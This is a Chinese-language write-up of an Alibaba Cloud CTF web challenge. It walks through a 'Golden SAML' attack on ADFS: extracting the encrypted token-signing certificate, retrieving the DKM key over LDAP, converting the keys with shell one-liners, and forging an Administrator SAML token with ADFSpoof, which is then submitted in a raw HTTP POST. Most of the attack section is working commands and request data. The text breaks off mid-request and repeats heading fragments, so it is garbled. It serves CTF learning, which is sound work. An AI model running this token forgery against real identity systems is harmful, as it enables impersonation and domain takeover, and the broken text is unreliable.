阿里云CTF Offens1ve Web题目解析与利用教程<\/h1>

1. 题目概述<\/h2>
这是一个关于ADFS (Active Directory Federation Services) 安全漏洞利用的CTF题目，目标是绕过ADFS身份验证系统，通过伪造安全令牌访问OA系统获取flag。<\/p>

2. 环境信息<\/h2>
题目提供了两个关键URL：<\/p>
ADFS服务: https:\/\/sts.offensive.local:8443<\/code><\/li>
监控系统: https:\/\/monitor.offensive.local:8080\/<\/code><\/li>
<\/ul>
3. 攻击思路<\/h2>

从ADFS数据库中提取令牌签名证书<\/li>
从Active Directory中获取DKM解密密钥<\/li>
使用这些密钥伪造SAML令牌<\/li>
以管理员身份登录OA系统获取flag<\/li>
<\/ol>
4. 详细利用步骤<\/h2>
4.1 获取令牌签名证书<\/h3>

访问监控系统中的"ADFS01"节点<\/li>
导出ADFS数据库配置数据文件：AdfsConfigurationV4_.IdentityServerPolicy_.ServiceSettings_.sql<\/code><\/li>
从文件中提取EncryptedPFX blob<\/code>内容<\/li>
将内容保存到TKSKey.txt<\/code>文件中<\/li>
<\/ol>
示例内容：<\/p>
AAAAAQAAAAAEEFF7U\/YZhGpDpmCDq7z2FE4GCWCGSAFlAwQCAQYJYIZIAWUDBAIBBglghkgBZQMEAQIEIK7wk3Wf90KhU+CCLgV4jlGhiEvVNqyiv6xvzbNT+rUCBBBF9dbh0blRfObYFN1skYzQIIIQoDXB0MZ7EOMz8msy7vbQoRl3tpVEBV1ofixVF5aVfn5coPQM8QO529QepH2HNnj5dbOh5M9Cu6mDcMlMMFahOLxd5ye9KB4PpS0ahH553wBx4e8X+VuJk7zy0IcHY+w4OgRSUFtazWFj2RFGRAALL9RcTb1T9Ui8av8Pfn8PQE2LeS6eFzupKn+87gF82e3oZI4eyUcl5qZiF0z3OKHa6nseA85jv65j1tBSePxirnevU7+nrJHAcxwpWiuyFW6gWCwiay4aQKSk79EXjP53+Z3RE2voi3foLdUSWtf+lfDmLd\/Y1l\/SssoLRwvokOGuc0whQLVvUwwtFVU2iMgoSkfiL37odPVzUYBzA6ZlA77nuQvASg0vc6lyyBFHYXqNxnKlHQN3tNPvkMuT0sghK3AVAVCEF8ebYpZ1V2VygrFdSuKSYe3Q5XPN1GmPkSns1uGPDYuKfQKEpKFrQRNMIErX6Zj4meIGU4JRQQGRRza+AmB9kPztZcM9BOrsPWJ3Acagc85eJO5FwVfBv+nboY3PDq\/Wl3JpV77stEsw\/CleiOLISsom7e9hFGfg0KhLRIWmwdsGxSncRaxxFPTH6eziDksA7Yp4W4blXFLFT2NNilrGQieO7ELbm6elEjDAU9V93EMLHACfp7PFKm+UFtDyRL81rh\/9ZWh9UNxKB4SUOgqYPUwEv9U65\/px04818vWpN6pxTiwgMAeQLZ3kksjp93HhJDfyQ9whW1tpLrjj2OUhxkprnCDgIciQi2LGG76S88HytwZEA13WSWErlLHiRb1vN4nkiYHjmi+bEhIR2OqpIc+LwaksppNP9NEdsBp8C+6Db6C9bjbY2VsrRXlK6jIsp+KHnJI6zGfP1Irx1mcqWXJV5xV0gBU\/5lpGF\/vRZRT1oIvZuXlXb2Jx84kbtVLrD+Wn0HeN14ObPLvKgMXItoEjAMUkWbx3GVDid\/cWVbqS\/2AQyqd7F7tCpXXS7ZaY1wq59djnC5k7zydQc5IMVV1e40bLr5bvooiroqunfhWz1H\/Y76yuhFOVWgjkv7OdHn4zlXBdYUfe1iWP9EgXzr77lEstCrSxXg\/oFbjwcVztrI80IJ5+1Q3nr6ODeOriZFXtGicBA3Ier28LDaWoxzGPtvl5\/lAJGQ+LhQMpNPA\/WFreXTIi3825GuXhjRuasLzGs7ONeLFq5P0o\/iz1\/43vGT8cJMlNCF3KwfTA455sqeI9aVKMhFNYpURQ+WZ0ZSL5WI+D4KElLNnOZvAJWETGPCwVezlgDDI8t98u0FrDiLn21snB7EdSR+0y86a36PieTFd+z8OstEsjw0mWeZGtElkEPQuz98vd\/c\/ayAuQzerLX\/c9EIT+jna7Uc3ZPXtO35Ln7bAbMvYXuWSFZrPLtS29DH02k7G4wIOz6jgEJrW\/t+twHsMrzmaQ59QKNZDP1XxbT1rOJpGoDw6o9aNKp7lrvUmACWkzb4HS\/xhHZGds3748IuSZgH\/uW8johR+ZdKiYhvEsEMr87yMnuziwl0Cu4zpfodh1ONqBS1FDMU4JCT7UPT95NFGdqWFTkWZhazpFRmTpUDmF6xZQOgILXDwmJ5ILM97z7\/sIBPDSmQzlxmZzBRCnSdEs5rxN5lLBT97t9miWXSdP0buZjGEFAlE2thKK1aTrZzHknrahEhKSQyk0kBWb5vXBRatbEhOGib2QCn4B6gf8v4LnWc93nru6b9h\/YCEzrXzUYFtnFFYDd2YNVzwMcdcERQSgjYuZDeiDDDqCwUfGI6D2FuseSK0ZOKJzUTHF8Rizlj\/+169M1DmikHqWKnClK2SI2cXdF4i+ziBpUkvtSRxpbj2a6+5zJ3aGTolRBr9qRyp5q2B7KQAmqomp43hh1a55I5CuAjMhn8dAcXwZgF5JjSW0fEJh\/ni02DLiBuVbcqvAGppIW9uyorHylzsRdR+sgJMlsJ4iZvgauOeukpYxmPeBbJ3Am+5xVx64XSfwPkdnRq4gdrBVB3rGeX0eQStZBWzwtZzSvaoQZzMLF6xXClyJFWVWBjh2yWIN9\/+Q+u7DdpqF4i0AgfARcmln47\/14lEq9hptC0OIUoUyz0hR5N5ylhwAp46aIqKrvB\/Ic331UJYnNPkfezpery96Q1PHSioAehfWihjAXsepeWy9IyGW6lDDi2+J2MROEzkKWO26seAjen5+pUvxxc3\/xOzuzMIbDqXr3ArhZyYjVuOynMzvHVfeb3WRGPoIUslsFsJKsS97CzUkzSf9EE1HtEZeTER1sw3DbMriW1fEf+87qbltqpFMM6j74UfOeWRSfSHNCwQ\/potMlexRTIExqVcG4460K6l450CKmkkemUpHWtidk2V4yUcf3jruuiePnXwQXW1srOzL2se3mfMmuEnUfNqhFoL2Dj\/V55Axc2JgCxhSWV26CZy3VQ6u2ssDCV7ZKp1GAmKx3qhs3EAg+TqTCLquPX5n6k1jsv2kDtnhp\/j7btjqQ\/Ubs4gqMQ\/d+IK14M0sRXpKs3Ngrm\/I5TnkvI6+L\/8ehxvqgRXVdSPmRMkpvo0KATl9MhlLmw+US9olfrhByt05sClPCtmJ79vTNrueIR0aVWIJasK7aNyHfF\/MG4MmPPjbCoNlclk\/lQhjHb\/OiQGXSt0lOmTfUiSL2CKl+moK8iqLFfAyT5IOsFlbaDE3EM1\/QzrDIRBZKaJEm01WSkIF+ChpzCOLtmtcUuTfnTAPeoYWeIEqiaXwXRQt2Ry3gf6JKrN5BGQgAci9sjPAvYI4+VpPf7\/4gcmC+dEIb0bN8WIPVcwlm2FQheGpKvULYkIDVT9BnzOthhp\/\/TBivsgdgzwouKBMWWO8PIyzix\/CDfQPZkg7UiYLKJ6mYVCn4uV+YUdPXe2y8hEB\/mC7CCQyqE\/ULzifMKZ0Y8oVx5GU4\/Qka\/c70+59KVCJ4YF+9H8nUtRBAExTbMHkbM2E1lu5TliT\/OhX\/s1c1arOzOB8UzSpkIKfkxhrFpjNM\/8Rb8Je8ZbGS7Ya0+QnshFpFMgfCg+UP\/Mub7Rpcn5NrOwd3YC4rLol7cg+CNh0IKFk05XDJEezxr1zhLcvUM3zxIuKrgGXTS6hl0qSwPk\/PtaiiGQuniTCfJVsIwSaoNj3E48z7Kc91NHxZqbF1KRmQGATXYVbhsrqcj\/kVDM3uDzY1Dg5mZz6OQhhQhsD2VAhbPI6Ie4XNgHYRR3Pjavb608S47NVH5jVENOMPKvrbh9z9WgfQTMcvPGU8+2bK3Fb2Uc1RplhtkPmdM991lr5iSyBeCmouVKZco5Ymjxb8w4rOL4sMYGcmJ7s6c3s2TLBiBhm5zcKQ5Dpkgp8hS7Y7DrXlSLLYtIDcOohTyXTBxBRlqzJ41JxctAwkXmUHfMGjIWpPub9a2pNIOASEngXlbKnwa0SKMfXm2mWx\/36\/6AnP5M\/bWY7lvjXn6ZcWlUMcYO5M2nR+gMyomdwzSGObxFax7PzN6mzn9esyh2JnFoS68JsrjkbGgZPCTqGV9tmVTsCExIJJ6hj5xpp0pk9AYIueHnM5oi5b+XS1rHH4m09gX\/gq0zaCbKB7QfE+qktIHSU+el0TrwsfSNbBOn7SxG\/NoW3KI2YZhYtWftPU8Yw8WefVjrXQ9NX8j0XV+ehNHeHqfawO1JYrnY8SOxH2FNVVq2Wz+gh9TAfd4c3V06uquiYbuXaTjqNFEODrPFcVElgyyD0qNLWstAPdR9AA3cX37iNZFyY5tTlxr9GAYhcjRyiVItgrNNilHpR+ydK0D2WPkeYEg4vLY0oeKKhR115L4ZU85vQJk9OfOGnIqjcfPRAYVWKrculHmuQKwHeUXrH0qh9nsmsLRJVT\/0CpfDYwOiNpLgrXqJ+aqtPyHHQ4RSIp\/2lqyvipWpg7DLxSEK+6QZ5yFxxl6fgRYN0M8JyRuwJZKqNZjj2BbH2JhG8a9soVFkI7WN2magktI5pA8CflkIWqBVzTwy5oJvMF67TquJY0ewsuvaFriDbS7QBo4Y4I1JxI6t7sEpcxwo9diOl3mVAZrYDDlFYw60Hy35K1W9SxP\/T+cveKWdimLZayjt2NfxV2o7XQ9ji4UKdM1l55C1ECxWc5Yqj1p0UV2+AJ1buo73386Jnye4YsJd3\/RBbf332kJvhsU+C1jR5bSmuqeuvgL6JGn6dPVbR3pxvqUEDXTM+15CB4OezBDdbuFRxmy2VWv5Twet69OjidwMlmSh4kVYh\/CdeyIsS+1fpPjsttMOEhSKVyCjZK0RBO4EeS\/lO15cV33u+pftF8XA\/DZgOEH5RAULwaHE4chkDl89vwAJPThfGaOV9SjABQ5PkjSurQiXwYKLmDJZX9EbM6FSN1RJDMBrdGGh9tkU8I40eSlx4vvOwdo9ToN\/VyMfBgJzB0h05TsODjPX7AIwVGLqqMPry8djFFXDkAfW5X5QYBx7HOwG1Hi+lRIzHFwU3b\/8yb+IPc2R3GgBlwTgvT82xHtlWi5v+rnAv6LKW\/UazVe1erParO6REs19DpF8TYtkXeSH4MzBAdElMk461tMxkPnWxdtnpIUpFVWvv9k8Yz6GY228JxBItlDF1YG4obvSgU6sZUeaVBfQWsRJr9pWjAOjz4WensT91qznUgOBEUt30nq2xHPwqDMpFByFK9G38s\/j8tqL+TzaQURtWdMl6SLy4y517Aak8wqWFdZmiQ3NBY0d8Bu6A2\/PVb8lwKAOl8htscTRVuTI+lisk8eKoMx9zZKOUWJlfrJ5DIyaUp7RIkmoaX5WylvC15ooBUwAYdznF6WS6WlrXkD\/3nLLB7o7nIa9jcGAQCpFQasMpZ58VQg4RgbYAc7KLKRarboU1oITdJoZod1A\/9KULdzhsrfzJsq7cBth5mcthAe1ymlSm0UTgQQv9K6CSx5m+W1gkA26Jda0HINQkd\/+ObfcU1\/PBbnGQkWmb0MI2rGGOBQvF61j7dT7lH5uAUKZDF\/sLQ\/VKOv8lxQW4goNTz203S1iqj1kcLdIaNJA3BXcDBlY\/3yT0JQuvNJArWeasLgH1Htio9JatIgjxUYZ3TOCPtoNyUGNC2T4QEQmOhUi2o5IdSWvGo1vWzJVvlq\/KEjman2EHH3ON4NpV\/lE2rf\/jbJtn62yf3ixR02IoeH2ihVSGJ743DUm2np9COBKv4TqNE8kiwqnDIwKVEp9h+lXzv9bv2uufYqupZu4I8lXnaHMFO3e+Je8XjpFUGJfhfzWiOstFPMOxW8Ib2CjnoSLSb5hpxm1uidzF+ZWwB13lK3bP\/FfzzXDSDHKaf8oVrYNgXrKH4QqK4Zg8maOnK2STLr\/305oi3gBAcs2nJ2aWoLM5rDew8uRFkRkGjLA\/EwTiFoNVkudnnWawxseWVvxwDIcB+TMnbbk6dcXlaJPJLyWm+TIT9dM3vpnZs6LKUqDHf2mOwobB8QkbIyN4onLjlIBBUwAamYu\/s5WpD8y9\/JdNYUXuU1xsL5Mbm5+bRdT8sfz9+E0rChwhi6\/ER7bL2nMbHlxHgzHv\/xFYnqveSMZNnZkJlAJGy4SRyiXmOuNEYifwHsQPp\/Fckcym+IFgP840G6mnQ7NJa0hFp6ONbsYqqtfjUYp\/i5F+1cq26TJdg24FXS71qtMUWN4f0fkr2ygK\/jeltxe1px0\/NVWy\/cOBsSJ\/DutAufrxtl8n\/vby
<\/code><\/pre>
4.2 获取DKM密钥<\/h3>

访问监控系统中的"DC"节点<\/li>
执行LDAP查询：
(&(thumbnailphoto=*)(objectClass=contact)(!(cn=CryptoPolicy)))
<\/code><\/pre>
<\/li>
从查询结果中提取DKM密钥<\/li>
将逗号分隔的值转换为空格分隔<\/li>
保存到DKMKey.txt<\/code>文件中<\/li>
<\/ol>
4.3 密钥格式转换<\/h3>


对TKSKey进行Base64解码：<\/p>
cat TKSKey.txt | base64 -d > TKSKey.bin
<\/span><\/span><\/code><\/pre><\/li>

将DKMKey转换为十六进制格式：<\/p>
cat DKMkey.txt | awk '{for(i=1;i<=NF;i++) printf "%02X%s", $i, (i<NF?" ":"\n")}'<\/span> | tr -d " "<\/span> | od -An -tx1 | tr -d " \n"<\/span> > DKMkey.bin
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
4.4 伪造SAML令牌<\/h3>
使用ADFSpoof工具生成伪造的SAML令牌：<\/p>
python3 ADFSpoof.py -b TKSKey.bin DKMkey.bin --server sts.offensive.local o365 --upn Administrator@offensive.local --objectguid {<\/span>FF6A004D-334C-4D19-AFEB-3F4467F9CBCE}<\/span>
<\/span><\/span><\/code><\/pre>4.5 发送伪造请求<\/h3>
构造POST请求发送伪造的SAML令牌：<\/p>
POST<\/span> \/ HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> oa.offensive.local:8443<\/span>
<\/span><\/span>Content-Length:<\/span> 7251<\/span>
<\/span><\/span>Cache-Control:<\/span> max-age=0<\/span>
<\/span><\/span>Sec-Ch-Ua:<\/span> "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"<\/span>
<\/span><\/span>Sec-Ch-Ua-Mobile:<\/span> ?0<\/span>
<\/span><\/span>Sec-Ch-Ua-Platform:<\/span> "macOS"<\/span>
<\/span><\/span>Origin:<\/span> https:\/\/sts.offensive.local<\/span>
<\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded<\/span>
<\/span><\/span>Upgrade-Insecure-Requests:<\/span> 1<\/span>
<\/span><\/span>User-Agent:<\/span> Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/131.0.0.0 Safari\/537.36<\/span>
<\/span><\/span>Accept:<\/span> text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.7<\/span>
<\/span><\/span>Sec-Fetch-Site:<\/span> same-site<\/span>
<\/span><\/span>Sec-Fetch-Mode:<\/span> navigate<\/span>
<\/span><\/span>Sec-Fetch-Dest:<\/span> document<\/span>
<\/span><\/span>Referer:<\/span> https:\/\/sts.offensive.local\/<\/span>
<\/span><\/span>Accept-Encoding:<\/span> gzip, deflate<\/span>
<\/span><\/span>Accept-Language:<\/span> zh-CN,zh;q=0.9,en;q=0.8,ru;q=0.7,ja;q=0.6<\/span>
<\/span><\/span>Priority:<\/span> u=0, i<\/span>
<\/span><\/span>Connection:<\/span> close<\/span>
<\/span><\/span>
<\/span><\/span>wa=wsignin1.0&wresult=%3Ct%3ARequestSecurityTokenResponse%20xmlns%3At%3D%22http%3A\/\/schemas.xmlsoap.org\/ws\/2005\/02\/trust%22%3E%3Ct%3ALifetime%3E%3Cwsu%3ACreated%20xmlns%3Awsu%3D%22http%3A\/\/docs.oasis-open.org\/wss\/2004\/01\/oasis-200401-wss-wssecurity-utility-1.0.xsd%22%3E2025-02-06T10%3A09%3A52.000Z%3C\/wsu%3ACreated%3E%3Cwsu%3AExpires%20xmlns%3Awsu%3D%22http%3A\/\/docs.oasis-open.org\/wss\/2004\/01\/oasis-200401-wss-wssecurity-utility-1.0.xsd%22%3E2025-02-06T11%3A09%3A52.000Z%3C\/wsu%3AExpires%3E%3C\/t%3ALifetime%3E%3Cwsp%3AAppliesTo%20xmlns%3Awsp%3D%22http%3A\/\/schemas.xmlsoap.org\/ws\/2004\/09\/policy%22%3E%3Cwsa%3AEndpointReference%20xmlns%3Awsa%3D%22http%3A\/\/www.w3.org\/2005\/08\/addressing%22%3E%3Cwsa%3AAddress%3Ehttps%3A\/\/oa.offensive.local%3A8443\/%3C\/wsa%3AAddress%3E%3C\/wsa%3AEndpointReference%3E%3C\/wsp%3AAppliesTo%3E%3Ct%3ARequestedSecurityToken%3E%3Csaml%3AAssertion%20xmlns%3Asaml%3D%22urn%3Aoasis%3Anames%3Atc%3ASAML%3A1.0%3Aassertion%22%20MajorVersion%3D%221%22%20MinorVersion%3D%221%22%20AssertionID%3D%22_E89JCT%22%20Issuer%3D%22http%3A\/\/sts.offensive.local\/adfs\/services\/trust%22%20IssueInstant%3D%222025-02-06T10%3A09%3A52.000Z%22%3E%3Csaml%3AConditions%20NotBefore%3D%222025-02-06T10%3A09%3A52.000Z%22%20NotOnOrAfter%3D%222025-02-06T11%3A09%3A52.000Z%22%3E%3Csaml%3AAudienceRestrictionCondition%3E%3Csaml%3AAudience%3Ehttps%3A\/\/oa.offensive.local%3A8443\/%3C\/saml%3AAudience%3E%3C\/saml%3AAudienceRestrictionCondition%3E%3C\/saml%3AConditions%3E%3Csaml%3AAttributeStatement%3E%3Csaml%3ASubject%3E%3Csaml%3ANameIdentifier%20Format%3D%22urn%3Aoasis%3Anames%3Atc%3ASAML%3A1.1%3Anameid-format%3Aunspecified%22%3EJndaBU4kdE2MsdOj93uRZQ%3D%3D%3C\/saml%3ANameIdentifier%3E%3Csaml%3ASubjectConfirmation%3E%3Csaml%3AConfirmationMethod%3Eurn%3Aoasis%3Anames%3Atc%3ASAML%3A1.0%3Acm%3Abearer%3C\/saml%3AConfirmationMethod%3E%3C\/saml%3ASubjectConfirmation%3E%3C\/saml%3ASubject%3E%3Csaml%3AAttribute%20AttributeName%3D%22upn%22%20AttributeNamespace%3D%22http%3A\/\/schemas.xmlsoap.org\/ws\/2005\/05\/identity\/claims%22%3E%3Csaml%3AAttributeValue%3EAdministrator%40offensive.local%3C\/saml%3AAttributeValue%3E%3C\/saml%3AAttribute%3E%3Csaml%3AAttribute%20AttributeName%3D%22primarysid%22%20AttributeNamespace%3D%22http%3A\/\/schemas.microsoft.com\/ws\/2008\/06\/identity\/claims%22%3E%3Csaml%3AAttributeValue%3ES-1
<\/span><\/span><\/code><\/pre>
阿里云CTF Offens1ve Web题目解析与利用教程<\/h1>

1. 题目概述<\/h2> 这是一个关于ADFS (Active Directory Federation Services) 安全漏洞利用的CTF题目，目标是绕过ADFS身份验证系统，通过伪造安全令牌访问OA系统获取flag。<\/p>

4. 详细利用步骤<\/h2>

1. 题目概述<\/h2>
这是一个关于ADFS (Active Directory Federation Services) 安全漏洞利用的CTF题目，目标是绕过ADFS身份验证系统，通过伪造安全令牌访问OA系统获取flag。<\/p>
